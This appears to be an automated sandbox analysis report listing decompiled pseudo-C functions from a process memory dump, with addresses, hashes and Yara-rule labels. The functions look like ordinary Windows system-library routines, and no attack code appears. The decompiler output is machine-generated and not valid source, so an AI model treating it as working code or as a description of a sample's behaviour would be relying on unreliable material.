Instruction ID: c26e20538dcbde8ff22756922e8953888e959a948f1cca51f0d4abf5a6cd7d80
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: AB31487160194BBFF746EBB4C980BF9FB94BF52200F0442AAD59C47391DB386A09D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01067016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01067016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x10dd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01066B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01066B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01007D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01029AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0102B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01004620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01067016
0x0106701e
0x0106702b
0x01067033
0x01067037
0x0106703c
0x0106703e
0x01067041
0x01067045
0x0106704a
0x01067050
0x01067055
0x0106705a
0x01067062
0x01067062
0x0106705a
0x01067064
0x01067064
0x01067067
0x01067071
0x01067096
0x0106709b
0x010670a2
0x010670a6
0x010670a7
0x010670ad
0x010670b3
0x010670b6
0x010670bb
0x010670c3
0x010670c3
0x010670c6
0x010670cd
0x010670dd
0x010670e0
0x010670e2
0x010670e2
0x010670ee
0x01067101
0x010670f0
0x010670f9
0x010670f9
0x0106710a
0x0106710e
0x01067112
0x01067117
0x01067118
0x01067118
0x010670bb
0x0106711d
0x01067123
0x01067131
0x01067131
0x01067136
0x0106713d
0x0106713e
0x0106713f
0x0106714a
0x0106714a
0x01067084
0x01067088
0x00000000
0x0106708e
0x0106708e
0x01067092
0x00000000
0x01067092

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9109a9185182ad67120fc196d1e1d5d27ea3affbf188efa19051862d873a4312
Instruction ID: b58cef6bbd76acff8785b5b0540616ec446b48c9d5642c1751bd273b59171d65
Opcode Fuzzy Hash: 9109a9185182ad67120fc196d1e1d5d27ea3affbf188efa19051862d873a4312
Instruction Fuzzy Hash: F531C272604751DBD321DF2CC940AAAB7E9BF88704F044A69F9D58B691E730E904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0101A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0101A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x10d7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x10d7b10 = 8;
					 *0x10d7b14 = 0x10d7b0c;
					 *0x10d7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0101A990(0x10d7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0101A840(__edx, __ecx, __ecx, _t52, 0x10d7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x10d7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x10d7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x10d7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01004620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x10d7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0102F3E0(_t50,  *0x10d7b14, _t8 >> 3);
						_t28 =  *0x10d7b14; // 0x0
						__eflags = _t28 - 0x10d7b0c;
						if(_t28 != 0x10d7b0c) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x10d7b14 = _t50;
						_t48 = _v12;
						 *0x10d7b10 = _t9;
						goto L6;
					}
					 *0x10d7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0101a713
0x0101a714
0x0101a717
0x0101a71d
0x0101a720
0x0101a722
0x0101a727
0x0101a74a
0x0101a754
0x0101a75e
0x0101a768
0x0101a76a
0x0101a773
0x0101a78b
0x0101a790
0x0101a792
0x0101a741
0x0101a741
0x0101a743
0x0101a749
0x0101a749
0x0101a732
0x0101a73a
0x0101a797
0x0101a79d
0x0101a7a3
0x0101a7a9
0x0101a7b6
0x0101a7bc
0x0101a7ca
0x0101a7e0
0x0101a7e2
0x0101a7e4
0x01059bf2
0x00000000
0x01059bf2
0x0101a7ed
0x0101a7f2
0x0101a800
0x0101a805
0x0101a80d
0x0101a812
0x01059c08
0x01059c08
0x0101a818
0x0101a81b
0x0101a821
0x0101a824
0x00000000
0x0101a824
0x0101a7ae
0x00000000
0x0101a7ae
0x0101a73c
0x0101a73e
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a389a92d18add4b91cd1746e1be937e5778f48a264f81c28192e3d4483d4a4
Instruction ID: bad714e623974b98ef79ce6ce50b9ee49dcdc84baa2e51e5f2b13f94578f233a
Opcode Fuzzy Hash: 74a389a92d18add4b91cd1746e1be937e5778f48a264f81c28192e3d4483d4a4
Instruction Fuzzy Hash: 0931C2B1702341DBD721CB08DC90F6A77F9FB84728F94095AEEC587248D37A9A01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010161A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E010161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01015E50(0xfc67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E010B9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00FEF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x010161b3
0x010161b5
0x010161bd
0x010161c3
0x010161c7
0x010161d2
0x010161ff
0x010161ff
0x01016201
0x01016207
0x01016207
0x010161d4
0x010161d9
0x00000000
0x00000000
0x010161df
0x010161e2
0x00000000
0x00000000
0x010161e6
0x010161e8
0x010161ee
0x010161ee
0x010161f9
0x0105762f
0x01057632
0x01057635
0x01057639
0x01057640
0x0105766e
0x01057675
0x00000000
0x00000000
0x01057681
0x01057689
0x0105768d
0x01057691
0x01057695
0x01057699
0x010576af
0x010576b5
0x010576b7
0x010576b7
0x010576d7
0x010576dc
0x00000000
0x010576dc
0x010576a2
0x010576a9
0x01057651
0x01057653
0x01057653
0x01057656
0x01057656
0x00000000
0x01057656
0x01057644
0x01057646
0x01057648
0x01057648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57797c4e7d46a1f54b3aca1040791b26eeb0817d68fe2cf14143fc21aaf7d3f
Instruction ID: 7317f0f9f0794864f00dcbdc53caa66220302297967f410a1706f9d650ea52f2
Opcode Fuzzy Hash: a57797c4e7d46a1f54b3aca1040791b26eeb0817d68fe2cf14143fc21aaf7d3f
Instruction Fuzzy Hash: AD316B716057018FE3A0CF1DC940B6ABBE5FB88B00F4949ADE9D89B251E7B5D804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FEAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00FEAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x10dd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x10d7b9c; // 0x0
					_t53 = L01004620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0102B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0102F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00FF6C59(_t53, _t51, _t58) != 0) {
							_t28 = E01015E50(0xfcc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0101B230(_v32, _v28, 0xfcc2d8, 1,  &_v24);
								_t28 = E00FEF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x00feaa25
0x00feaa29
0x00feaa2d
0x00feaa30
0x00feaa37
0x00feaa3c
0x01044458
0x01044458
0x01044472
0x01044474
0x01044476
0x00feaa64
0x00feaa74
0x0104447c
0x01044483
0x01044492
0x00feaa52
0x00feaa54
0x00feaa5e
0x010444a8
0x010444ad
0x010444af
0x010444b6
0x010444b6
0x010444b9
0x010444bc
0x010444cd
0x010444d3
0x010444d6
0x010444e1
0x010444e1
0x010444e6
0x010444e8
0x010444fb
0x010444fb
0x010444e8
0x00000000
0x00feaa5e
0x01044476
0x00feaa42
0x00feaa46
0x00feaa48
0x00feaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d4ae14ccaf6cc9e8e02569d83b9f2d8f71d6e203b8295589da62b4be1fdc49
Instruction ID: 6f5f34788097e072b70d13a2b426675bf6cbc9edd5cf2651ee69d016496d354c
Opcode Fuzzy Hash: c5d4ae14ccaf6cc9e8e02569d83b9f2d8f71d6e203b8295589da62b4be1fdc49
Instruction Fuzzy Hash: 1C31E571A0061AEBCB119F65CD81ABFB7B8FF44B00F014469F945D7150EB78AD11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01024A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01024A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x10dd360 ^ _t62;
				_v8 =  *0x10dd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01002280(_t26, 0x10d8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00FFFFB0(_t41, _t51, 0x10d8608);
						L2:
						 *0x10db1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0102B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01002280(_t28, 0x10d8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00FFFFB0(_t42, _t53, 0x10d8608);
							if(_t53 != 0) {
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00FFFFB0(_t41, _t51, 0x10d8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01024a2c
0x01024a34
0x01024a3c
0x01024a3e
0x01024a48
0x01024a4b
0x01024a4d
0x01024a51
0x01024a9c
0x00000000
0x00000000
0x01024aa3
0x01024aa8
0x01024aad
0x01024ab1
0x01024ade
0x01024ae3
0x01024a5a
0x01024a62
0x01024a6a
0x01024a6e
0x0105f203
0x01024a84
0x01024a88
0x01024a89
0x01024a8a
0x01024a95
0x01024a95
0x01024a79
0x01024a80
0x01024af2
0x01024af4
0x01024af9
0x01024aff
0x01024b01
0x01024b03
0x01024b08
0x0105f20a
0x0105f212
0x0105f216
0x0105f216
0x01024b08
0x01024b13
0x01024b1a
0x0105f229
0x0105f229
0x01024b1a
0x01024a82
0x00000000
0x01024a82
0x01024ab7
0x01024acd
0x01024acd
0x01024ad5
0x01024ada
0x00000000
0x01024ada
0x01024ac2
0x01024acb
0x00000000
0x00000000
0x00000000
0x01024acb
0x01024a53
0x01024a53
0x01024a58
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6881e3135d85c3b28320a878ccd71a451ee12d5f02319d108707dbfcd5a2d9b
Instruction ID: e971bcbf50148c84edaaae6ef89f991b99b00fcc204e7454d5a7b7dbe3256a6b
Opcode Fuzzy Hash: d6881e3135d85c3b28320a878ccd71a451ee12d5f02319d108707dbfcd5a2d9b
Instruction Fuzzy Hash: C4313532202321DBD762DF59C944B2BBBE4FF85710F4045ADE9D68B291CB74D804CB85

Uniqueness

Uniqueness Score: -1.00%

Function 01028EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01028EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x10dd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01014E70(0x10d86e4, 0x1029490, 0, 0);
					if( *0x10d53e8 > 5 && E01028F33(0x10d53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x10d53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x10d53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xfcbc46;
						_t48 = E01067B9C(0x10d53e8, 0xfcbc46, _t67, 0x10d53e8, _t70,  &_v140);
					}
				}
				return E0102B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01028ec7
0x01028ed9
0x01028edc
0x01028ee6
0x01028ee9
0x01028eee
0x01028efc
0x01028f08
0x01061349
0x01061353
0x0106135d
0x01061366
0x0106136f
0x01061375
0x0106137c
0x01061385
0x01061390
0x01061391
0x0106139c
0x0106139d
0x010613a6
0x010613ac
0x010613b2
0x010613b5
0x010613bc
0x010613bf
0x010613c2
0x010613c5
0x010613c8
0x010613cb
0x010613ce
0x010613d1
0x010613d4
0x010613d7
0x010613da
0x010613dd
0x010613e0
0x010613e3
0x010613e6
0x010613e9
0x010613f6
0x01061400
0x01061400
0x01028f08
0x01028f32

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8c8817ebae0198008c75c4a2e5ca1b16e7ccfbc648f08bc33bf8c8410481b6
Instruction ID: 411f9079fa94d050baa50be2f7cd7fc1b8a1797e34a2a94c90e50fdb9a67ed53
Opcode Fuzzy Hash: 1f8c8817ebae0198008c75c4a2e5ca1b16e7ccfbc648f08bc33bf8c8410481b6
Instruction Fuzzy Hash: 6A4181B5D003289FDB60CFAAD981AADFBF4FB48710F5081AEE559A7240DB745A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0101E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0101E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01029670() < 0) {
					L0103DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x10d7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01004620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0101E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0101e730
0x0101e736
0x0101e738
0x0101e73d
0x0101e73e
0x0101e740
0x0101e749
0x0101e765
0x0101e76a
0x0101e76b
0x0101e76c
0x0101e76d
0x0101e76e
0x0101e76f
0x0101e775
0x0101e777
0x0101e77e
0x0105b675
0x0101e784
0x0101e784
0x0101e789
0x0101e7a8
0x0101e7ac
0x0101e807
0x0101e7ae
0x0101e7ae
0x0101e7b1
0x0101e7b4
0x0101e7b9
0x0101e7c0
0x0101e7c4
0x0101e7ca
0x0101e7cc
0x00000000
0x0101e7d3
0x0101e7d6
0x00000000
0x00000000
0x0101e7ff
0x0101e802
0x00000000
0x00000000
0x0101e7f9
0x0101e7fc
0x00000000
0x00000000
0x0101e7f3
0x0101e7f6
0x00000000
0x00000000
0x0101e7ed
0x0101e7f0
0x00000000
0x00000000
0x0101e7e7
0x0101e7ea
0x00000000
0x00000000
0x0105b685
0x0105b688
0x00000000
0x00000000
0x0105b682
0x00000000
0x00000000
0x0101e7cc
0x0101e7d9
0x0101e7dc
0x0101e7de
0x0101e7de
0x0101e7ac
0x0101e7e4
0x0101e74b
0x0101e751
0x0101e759
0x0101e761
0x0101e761

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2880d331e45a209c1b7b39dbe5fc474e3e6c7345b2973bbf480567edfda0c19a
Instruction ID: fbe891eeb2e53ec7d0e1b26fec1f1952a46ef78f3677334fe9f39b53717e013a
Opcode Fuzzy Hash: 2880d331e45a209c1b7b39dbe5fc474e3e6c7345b2973bbf480567edfda0c19a
Instruction Fuzzy Hash: 20318D75A14249EFE745CF58C841B9ABBE8FB08314F148296FE48CB341D635EC80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0101BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0101BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x10d6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01002280(0xd, 0x542f1a0);
				_t41 =  *0x10d60f8; // 0x0
				if(_t41 != 0) {
					 *0x10d60f8 =  *_t41;
					 *0x10d60fc =  *0x10d60fc + 0xffff;
				}
				E00FFFFB0(_t41, 0x800, 0x542f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x10d60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01004620(0x10d6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x10d6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0101bc36
